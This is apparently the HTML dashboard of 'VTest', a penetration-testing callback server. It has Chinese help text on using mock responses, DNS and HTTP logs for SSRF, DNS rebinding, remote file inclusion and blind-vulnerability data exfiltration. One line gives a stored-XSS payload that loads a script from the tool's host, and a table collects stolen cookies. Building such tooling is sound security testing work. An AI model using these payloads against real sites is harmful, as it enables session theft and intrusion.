<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="utf-8">
    <title>VTest - 漏洞测试辅助系统</title>
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css">
    <script src="https://code.jquery.com/jquery-3.3.1.min.js"
            integrity="sha256-FgpCb/KJQlLNfOu91ta32o/NMZxltwRo8QtmkMRdAu8=" crossorigin="anonymous"></script>
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <script src="https://unpkg.com/bootstrap-table@1.14.2/dist/bootstrap-table.min.js"></script>
    <link rel="stylesheet" href="https://unpkg.com/bootstrap-table@1.14.2/dist/bootstrap-table.min.css">
    <script>
        $(document).ready(function () {
            $('#dnslog_table').bootstrapTable({
                url: '/dns',
                pagination: true,
                sidePagination: 'server',
                search: true,
                escape: true,
                columns: [{
                    field: 'domain',
                    title: 'Query'
                }, {
                    field: 'ip',
                    title: 'Result IP'
                }, {
                    field: 'insert_time',
                    title: 'Query Time'
                }]
            });
            $('#httplog_table').bootstrapTable({
                url: '/httplog',
                pagination: true,
                sidePagination: 'server',
                search: true,
                escape: true,
                columns: [{
                    field: 'url',
                    title: 'URL'
                }, {
                    field: 'headers',
                    title: 'Headers'
                }, {
                    field: 'data',
                    title: 'POST Data'
                }, {
                    field: 'ip',
                    title: 'Source IP'
                }, {
                    field: 'insert_time',
                    title: 'Request Time'
                }]
            });
            $('#mock_table').bootstrapTable({
                url: '/mock',
                pagination: true,
                sidePagination: 'server',
                escape: true,
                columns: [{
                    field: 'url',
                    title: 'Mock URL'
                }, {
                    field: 'code',
                    title: 'Code'
                }, {
                    field: 'headers',
                    title: 'Headers'
                }, {
                    field: 'body',
                    title: 'Body'
                }, {
                    field: 'insert_time',
                    title: 'Request Time'
                }]
            });
            $('#xss_table').bootstrapTable({
                url: '/xss',
                pagination: true,
                sidePagination: 'server',
                escape: true,
                columns: [{
                    field: 'name',
                    title: 'Name'
                }, {
                    field: 'location',
                    title: 'Source Location'
                }, {
                    field: 'cookie',
                    title: 'Cookies'
                }, {
                    field: 'other',
                    title: 'Other Info'
                }, {
                    field: 'insert_time',
                    title: 'Receive Time'
                }]
            });
        });
    </script>
</head>

<body>
<div class="container">
    <ul id="myTab" class="nav nav-tabs">
        <li class="active"><a href="#mock" data-toggle="tab">Mock</a></li>
        <li><a href="#dnslog" data-toggle="tab">DNS Tools</a></li>
        <li><a href="#httplog" data-toggle="tab">HTTP Log</a></li>
        <li><a href="#xss" data-toggle="tab">XSS</a></li>
    </ul>
    <div id="myTabContent" class="tab-content">
        <div class="tab-pane fade in active" id="mock">
            <div class="panel panel-default">
                <div class="panel-heading">
                    <p><b>使用帮助：</b><br> 自定义http请求返回结果，方便漏洞测试
                        <br> 例如：
                        <br> 1.定义返回内容为php代码，用于测试php远程文件包含漏洞
                        <br> 2.定义301/302跳转，测试SSRF漏洞
                    </p>
                    <button type="button" class="btn btn-default" data-toggle="modal" data-target="#mock_add">新增
                    </button>
                </div>
                <table id="mock_table" style="word-break:break-all; word-wrap:break-all;">
                </table>
            </div>
        </div>
        <div class="tab-pane fade" id="dnslog">
            <div class="panel panel-default">
                <div class="panel-heading">
                    <p><b>使用帮助：</b><br> 可用于辅助判断无法回显漏洞以及特殊场景下的使用
                        <br> 例如：
                        <br> 请确保{domain}域名NS指向部署运行此脚本的IP上
                        <br> 1.<code>vultest.{domain}</code>，任意多级域名解析均会记录显示，可用于各种无回显漏洞的判断、漏洞分析、数据回传
                        <br> 2.<code>10.100.11.22.{domain}</code> 解析结果为
                        10.100.11.22，用于特殊的漏洞场景（例如某个ssrf限制了域名且判断存在问题，用这个可以方便的遍历内网资源）
                        <br> 3.<code>66.123.11.11.10.100.11.22.{domain}</code>
                        首次解析为66.123.11.11，第二次则解析为10.100.11.22，可用于DNS rebinding的漏洞测试
                    </p>
                </div>
                <table id="dnslog_table" style="word-break:break-all; word-wrap:break-all;">
                </table>
            </div>
        </div>
        <div class="tab-pane fade" id="httplog">
            <div class="panel panel-default">
                <div class="panel-heading">
                    <p><b>使用帮助：</b><br> 可用于辅助判断无法回显漏洞以及特殊场景下的使用
                        <br> 例如：
                        <br> 1.<code>http://httplog.{domain}/httplog/test</code>，httplog和mock路由下的任意HTTP请求均会记录详细的请求包，可用于各种无回显漏洞的判断、漏洞分析、信息收集、数据回传
                        <br>
                    </p>
                </div>
                <table id="httplog_table" style="word-break:break-all; word-wrap:break-all;">
                </table>
            </div>
        </div>
        <div class="tab-pane fade" id="xss">
            <div class="panel panel-default">
                <div class="panel-heading">
                    <p><b>使用帮助：</b><br> 用于测试储存型xss漏洞
                        <br> JS地址：http://x.{domain}/xss/test/js test可自定义，用于项目区分<br> 例如：<code>'"/>&lt;script
                            src=http://x.{domain}/xss/test/js&gt;&lt;/script&gt;</code>
                    </p>
                </div>
                <table id="xss_table" style="word-break:break-all; word-wrap:break-all;">
                </table>
            </div>
        </div>
    </div>
</div>
</body>
<div class="modal fade" id="mock_add" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-hidden="true">
                    &times;
                </button>
                <h4 class="modal-title">
                    新增
                </h4>
            </div>
            <form role="form" action="/mock" method="POST">
                <div class="modal-body">
                    <div class="form-group">
                        <input type="hidden" name="action" value="add">
                        <label>Name</label>
                        <input type="text" class="form-control" name="name" placeholder="test">
                        <label>Code</label>
                        <input type="text" class="form-control" name="code" value="200">
                        <label>Headers</label>
                        <textarea name="headers" class="form-control" rows="4"
                                  placeholder="Server: xxxx&#13;&#10;Location: http://test.com"></textarea>
                        <label>Body</label>
                        <textarea name="body" class="form-control" rows="4" placeholder="phpinfo();"></textarea>
                    </div>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-default" data-dismiss="modal">关闭</button>
                    <button type="submit" class="btn btn-primary">新增</button>
                </div>
            </form>
        </div>
        <!-- /.modal-content -->
    </div>
    <!-- /.modal -->
</div>

</html>